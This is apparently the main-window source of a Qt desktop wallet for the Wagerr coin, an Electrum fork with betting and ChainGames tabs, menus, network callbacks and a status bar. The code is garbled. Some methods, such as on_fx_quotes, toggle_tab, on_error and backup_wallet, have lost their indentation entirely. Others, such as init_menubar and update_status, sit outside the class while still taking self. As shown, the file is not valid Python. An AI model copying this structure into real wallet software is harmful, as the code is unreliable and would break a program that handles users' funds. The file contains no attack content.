class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
    # Qt signals used to marshal work from network/worker threads onto
    # the GUI thread (Qt signal emission is thread-safe; widget access
    # is not).
    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    new_fx_quotes_signal = pyqtSignal()
    new_fx_history_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()
    def __init__(self, gui_object, wallet: Abstract_Wallet):
        """Build the main wallet window for *wallet*: state, tabs, menus,
        keyboard shortcuts, and network-callback wiring."""
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        self.hbox=QHBoxLayout()
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        assert wallet, "no wallet"
        self.wallet = wallet
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.invoices = wallet.invoices
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.checking_accounts = False
        self.qr_window = None
        self.not_enough_funds = False
        self.pluginsdialog = None
        self.require_fee_update = False
        self.tl_windows = []
        self.tx_external_keypairs = {}
        # Cached wallet password; wiped whenever the gui-wide password
        # timer fires.
        self.password = None
        def reset_password():
            self.password = None
        self.gui_object.password_timer.timeout.connect(reset_password)
        Logger.__init__(self)
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0
        self.create_status_bar()
        self.need_update = threading.Event()
        self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
        try:
            decimal_point_to_base_unit_name(self.decimal_point)
        except UnknownBaseUnit:
            self.decimal_point = DECIMAL_POINT_DEFAULT
        self.num_zeros = int(config.get('num_zeros', 0))
        self.completions = QStringListModel()
        self.sports_data = ''
        # ---- tab construction ------------------------------------------
        self.tabs = tabs = QTabWidget(self)
        self.tabs.setStyleSheet("QTabWidget::pane {"
                                "background-color: #DEE2E6;"
                                "border:0;"
                                "}")
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        self.betting_tab = self.create_betting_tab()
        self.chaingames_tab = self.create_chaingames_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
        tabs.addTab(self.betting_tab, read_QIcon("tab_betting.png"), _('Betting'))
        tabs.addTab(self.chaingames_tab, read_QIcon("tab_chaingame.png"), _('ChainGames'))
        tabs.addTab(self.create_betting_history_tab(), read_QIcon("tab_bettinghistory.png"), _('Betting History'))
        # ChainGames (index 4 above) starts disabled.
        tabs.setTabEnabled(4, False)
        def add_optional_tab(tabs, tab, icon, description, name):
            # Register metadata used by toggle_tab(); only actually add
            # the tab when the user enabled it in the config.
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))
        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.setCentralWidget(tabs)
        if self.config.get("is_maximized"):
            self.showMaximized()
        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()
        # Keyboard shortcuts; wrtabs is a weak proxy so the lambdas below
        # do not keep the tab widget (and hence this window) alive.
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        for i in range(wrtabs.count()):
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.history_list.setFocus(True)
        self.betting_history_list.setFocus(True)
        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            self.network.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
            self.network.register_callback(self.on_quotes, ['on_quotes'])
            self.network.register_callback(self.on_history, ['on_history'])
            self.new_fx_quotes_signal.connect(self.on_fx_quotes)
            self.new_fx_history_signal.connect(self.on_fx_history)
        # update fee slider in case we missed the callback
        self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()
        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = self.question(title="Electrum - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum available?"))
            config.set_key('check_updates', bool(choice), save=True)
        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
            def on_version_received(v):
                if UpdateCheck.is_newer(v):
                    self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                    self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                    self.update_check_button.show()
            self._update_check_thread = UpdateCheckThread(self)
            self._update_check_thread.checked.connect(on_version_received)
            self._update_check_thread.start()
    def on_history(self, b):
        # Network callback (non-GUI thread): fiat history changed, so
        # drop the cached per-coin fiat prices and hand the GUI refresh
        # off to the GUI thread via the signal.
        self.wallet.clear_coin_price_cache()
        self.new_fx_history_signal.emit()
    def setup_exception_hook(self):
        # Install the crash-reporter hook for uncaught exceptions.
        Exception_Hook(self)
    def on_fx_history(self):
        # GUI-thread handler for new_fx_history_signal: re-render the
        # history with the new fiat data and refresh address balances.
        self.history_model.refresh('fx_history')
        self.address_list.update()
    def on_quotes(self, b):
        # Network callback (non-GUI thread): forward to the GUI thread.
        self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented. This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        # Paired with pop_top_level_window(); the most recent entry wins.
        self.tl_windows.append(window)
    def pop_top_level_window(self, window):
        # Counterpart to push_top_level_window().
        self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
    def diagnostic_name(self):
        """Short identifier used by Logger for this window's log lines."""
        #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
        return self.wallet.diagnostic_name()
    def is_hidden(self):
        # A minimised window counts as hidden for tray toggling purposes.
        return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
    def bring_to_top(self):
        # Unhide and raise above sibling windows.
        self.show()
        self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
    def on_network(self, event, *args):
        """Network-thread callback; must not touch Qt widgets directly.

        Cheap bookkeeping happens here; anything that updates the GUI is
        forwarded to the GUI thread via network_signal.
        """
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                # Queued for rate-limited notification by the GUI timer.
                self.tx_notification_queue.put(tx)
        elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
            # Handle in GUI thread
            self.network_signal.emit(event, args)
        else:
            self.logger.info(f"unexpected network message: {event} {args}")
    def on_network_qt(self, event, args=None):
        # Handle a network message in the GUI thread
        if event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                # Propagate the new mined status to every history view.
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
                self.betting_history_model.update_tx_mined_status(tx_hash, tx_mined_status)
                self.dice_history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.require_fee_update = True
        elif event == 'fee_histogram':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.require_fee_update = True
            self.history_model.on_fee_histogram()
        else:
            self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
    def close_wallet(self):
        """Log the wallet closing and give plugins a chance to clean up."""
        if self.wallet:
            self.logger.info(f'close_wallet {self.wallet.storage.path}')
        run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet):
        """Bind *wallet* to this window and refresh all views/menus."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.tabs.show()
        self.init_geometry()
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        # try:
        #     self.sports_data = self.network.run_from_another_thread(self.network.get_sports_list(timeout=3))
        #     print('Sport List: ', self.sports_data)
        # except Exception as e:
        #     self.show_message(_("Error getting event list from network") + ":\n" + str(e))
        #     return
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-Wagerr Testnet" if constants.net.TESTNET else "Electrum-Wagerr"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
#self.export_menu.setEnabled(self.wallet.can_export())
    def warn_if_watching_only(self):
        """Warn the user when the opened wallet cannot spend."""
        if self.wallet.is_watching_only():
            # NOTE(review): these translatable strings say "Bitcoins"
            # although this fork targets Wagerr — confirm intended
            # wording before changing the msgids.
            msg = ' '.join([
                _("This wallet is watching-only."),
                _("This means you will not be able to spend Bitcoins with it."),
                _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
            ])
            self.show_warning(msg, title=_('Watch-only wallet'))
    def warn_if_testnet(self):
        """Show a once-per-process warning dialog when on testnet."""
        if not constants.net.TESTNET:
            return
        # user might have opted out already
        if self.config.get('dont_show_testnet_warning', False):
            return
        # only show once per process lifecycle
        if getattr(self.gui_object, '_warned_testnet', False):
            return
        self.gui_object._warned_testnet = True
        msg = ''.join([
            _("You are in testnet mode."), ' ',
            _("Testnet coins are worthless."), '\n',
            _("Testnet is separate from the main Wagerr network. It is used for testing.")
        ])
        cb = QCheckBox(_("Don't show this again."))
        cb_checked = False
        def on_cb(x):
            # Track checkbox state; show_warning blocks until closed.
            nonlocal cb_checked
            cb_checked = x == Qt.Checked
        cb.stateChanged.connect(on_cb)
        self.show_warning(msg, title=_('Testnet'), checkbox=cb)
        if cb_checked:
            self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
    def get_wallet_folder(self):
        """Directory containing the currently configured wallet file."""
        return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
    """Build the main window's menu bar: File, Wallet, View, Tools and Help menus."""
    menubar = QMenuBar()
    # --- File menu: wallet file management ---
    file_menu = menubar.addMenu(_("&File"))
    self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
    file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
    file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
    file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
    file_menu.addAction(_("Delete"), self.remove_wallet)
    file_menu.addSeparator()
    file_menu.addAction(_("&Quit"), self.close)
    # --- Wallet menu: keys, labels, history, contacts, invoices ---
    wallet_menu = menubar.addMenu(_("&Wallet"))
    wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
    wallet_menu.addSeparator()
    # Kept as attributes so availability can be toggled per wallet type.
    self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
    self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
    self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
    self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
    self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
    #self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
    self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
    wallet_menu.addSeparator()
    addresses_menu = wallet_menu.addMenu(_("&Addresses"))
    addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
    labels_menu = wallet_menu.addMenu(_("&Labels"))
    labels_menu.addAction(_("&Import"), self.do_import_labels)
    labels_menu.addAction(_("&Export"), self.do_export_labels)
    history_menu = wallet_menu.addMenu(_("&History"))
    history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
    history_menu.addAction(_("&Summary"), self.history_list.show_summary)
    history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
    history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
    contacts_menu = wallet_menu.addMenu(_("Contacts"))
    contacts_menu.addAction(_("&New"), self.new_contact_dialog)
    contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
    contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
    invoices_menu = wallet_menu.addMenu(_("Invoices"))
    invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
    invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
    wallet_menu.addSeparator()
    wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
    # --- View menu: show/hide optional tabs ---
    def add_toggle_action(view_menu, tab):
        is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
        item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
        tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
    view_menu = menubar.addMenu(_("&View"))
    add_toggle_action(view_menu, self.addresses_tab)
    add_toggle_action(view_menu, self.utxo_tab)
    add_toggle_action(view_menu, self.contacts_tab)
    add_toggle_action(view_menu, self.console_tab)
    # --- Tools menu ---
    tools_menu = menubar.addMenu(_("&Tools"))
    # Settings / Preferences are all reserved keywords in macOS using this as work around
    tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
    tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
    #tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
    tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Pay to many"), self.paytomany)
    raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
    raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
    raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
    raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
    raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
    self.raw_transaction_menu = raw_transaction_menu
    # Plugins may append their own tool actions.
    run_hook('init_menubar_tools', self, tools_menu)
    # --- Help menu ---
    help_menu = menubar.addMenu(_("&Help"))
    help_menu.addAction(_("&About"), self.show_about)
    help_menu.addAction(_("&Check for updates"), self.show_update_check)
    help_menu.addAction(_("&Official website"), lambda: webopen("https://wagerr.com"))
    help_menu.addSeparator()
    help_menu.addAction(_("&Documentation"), lambda: webopen("https://wagerr.zendesk.com/hc/en-us/categories/360002783232-Wagerr-Electrum-SPV-wallet")).setShortcut(QKeySequence.HelpContents)
    help_menu.addAction(_("&Report Bug"), self.show_report_bug)
    help_menu.addSeparator()
    self.setMenuBar(menubar)
def donate_to_server(self):
    """Pre-fill the Send tab with the current server's donation address, if it has one."""
    addr = self.network.get_donation_address()
    if not addr:
        self.show_error(_('No donation address for this server'))
        return
    server_host = self.network.get_parameters().host
    self.pay_to_URI('wagerr:%s?message=donation for %s' % (addr, server_host))
def show_about(self):
    """Show the About dialog with the version number and project blurb."""
    QMessageBox.about(self, "Electrum",
        (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
         _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
         _("You do not need to perform regular backups, because your wallet can be "
           "recovered from a secret phrase that you can memorize or write on paper.") + " " +
         _("Startup times are instant because it operates in conjunction with high-performance "
           "servers that handle the most complicated parts of the Wagerr system.") + "\n\n" +
         _("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
    """Open the update-check window, optionally pinned to a specific *version*."""
    # Keep a reference on the gui object so the window is not garbage collected.
    checker = UpdateCheck(self, version)
    self.gui_object._update_check = checker
def show_report_bug(self):
    """Show a dialog explaining how and where to file bug reports."""
    parts = [
        _("Please report any bugs as issues on github:<br/>"),
        f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
        _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs."),
    ]
    self.show_message(' '.join(parts), title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
    """Show desktop notifications for newly arrived transactions.

    Drains self.tx_notification_queue; suppressed while the wallet is
    still syncing and rate limited to one burst per 20 seconds.
    Three or more transactions are combined into a single summary.
    """
    if self.tx_notification_queue.qsize() == 0:
        return
    if not self.wallet.up_to_date:
        return  # no notifications while syncing
    now = time.time()
    rate_limit = 20  # seconds
    if self.tx_notification_last_time + rate_limit > now:
        return
    self.tx_notification_last_time = now
    self.logger.info("Notifying GUI about new transactions")
    pending = []
    while True:
        try:
            pending.append(self.tx_notification_queue.get_nowait())
        except queue.Empty:
            break
    if len(pending) >= 3:
        # Combine the transactions if there are at least three.
        total = 0
        for tx in pending:
            is_relevant, is_mine, delta, fee = self.wallet.get_wallet_delta(tx)
            if is_relevant:
                total += delta
        self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                    .format(len(pending), self.format_amount_and_units(total)))
    else:
        for tx in pending:
            is_relevant, is_mine, delta, fee = self.wallet.get_wallet_delta(tx)
            if is_relevant:
                self.notify(_("New transaction: {}").format(self.format_amount_and_units(delta)))
def notify(self, message):
    """Show *message* as a system-tray balloon notification (20 s timeout)."""
    if not self.tray:
        return
    try:
        # The QIcon overload of showMessage requires Qt 5.9.
        self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
    except TypeError:
        # Older Qt: fall back to the standard information icon.
        self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def getOpenFileName(self, title, filter=""):
    """Wrapper for QFileDialog.getOpenFileName that remembers the directory
    last selected by the user (persisted in config key 'io_dir')."""
    last_dir = self.config.get('io_dir', os.path.expanduser('~'))
    selected, __ = QFileDialog.getOpenFileName(self, title, last_dir, filter)
    if selected:
        chosen_dir = os.path.dirname(selected)
        if chosen_dir != last_dir:
            self.config.set_key('io_dir', chosen_dir, True)
    return selected
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
    """Periodic housekeeping driven by the GUI timer.

    Note this runs in the GUI thread.
    """
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    elif not self.wallet.up_to_date:
        # this updates "synchronizing" progress
        self.update_status()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    # update fee, at most once per tick
    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
    self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Render the satoshi amount *x* as text using the window's display settings."""
    return format_satoshis(
        x,
        self.num_zeros,
        self.decimal_point,
        is_diff=is_diff,
        whitespaces=whitespaces,
    )
def format_amount_and_units(self, amount):
    """Return *amount* with the base unit appended, plus a fiat equivalent when available."""
    text = '{} {}'.format(self.format_amount(amount), self.base_unit())
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text += ' (%s)' % fiat
    return text
def format_fee_rate(self, fee_rate):
    """Format *fee_rate* (given in sat/kB) as a human-readable sat/byte string."""
    per_byte = fee_rate / 1000
    return format_fee_satoshis(per_byte, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
    """Return the number of decimal places used when displaying amounts."""
    return self.decimal_point
def base_unit(self):
    """Return the display name of the base unit for the current decimal point."""
    return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a coin-amount edit and its fiat counterpart mutually in sync.

    Whichever field the user edits drives the other via the current
    exchange rate.  The driven field is temporarily flagged with
    ``follows`` so its own textChanged handler returns immediately,
    preventing infinite mutual updates.  ``fee_e`` may be None; when
    present it is cleared/recomputed alongside the coin amount.
    """
    def edit_changed(edit):
        if edit.follows:
            # Programmatic mirror update, not a user edit — ignore.
            return
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        # NaN signals "no exchange rate available".
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # Cannot convert: blank out the opposite field.
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False
    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the status bar text/icon, tray tooltip and balance label
    from the current network and wallet synchronization state."""
    if not self.wallet:
        return
    if self.network is None:
        text = _("Offline")
        icon = read_QIcon("status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            num_sent, num_answered = self.wallet.get_history_sync_state_details()
            text = ("{} ({}/{})"
                    .format(_("Synchronizing..."), num_answered, num_sent))
            icon = read_QIcon("status_waiting.png")
        elif server_lag > 1:
            # Our local chain tip is more than one block ahead of the server.
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = read_QIcon("status_lagging%s.png"%fork_str)
        else:
            # Fully synced: show confirmed / unconfirmed / unmatured balances.
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = read_QIcon("status_connected%s.png"%fork_str)
            else:
                icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = read_QIcon("status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    # NOTE(review): this dereferences self.network unconditionally, even on
    # the Offline branch above — confirm the offline path is unreachable here.
    self.blockchain_status.setText("Height: {} ".format(self.network.get_local_height()))
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar, and the tab contents when there is nothing left to wait for."""
    self.update_status()
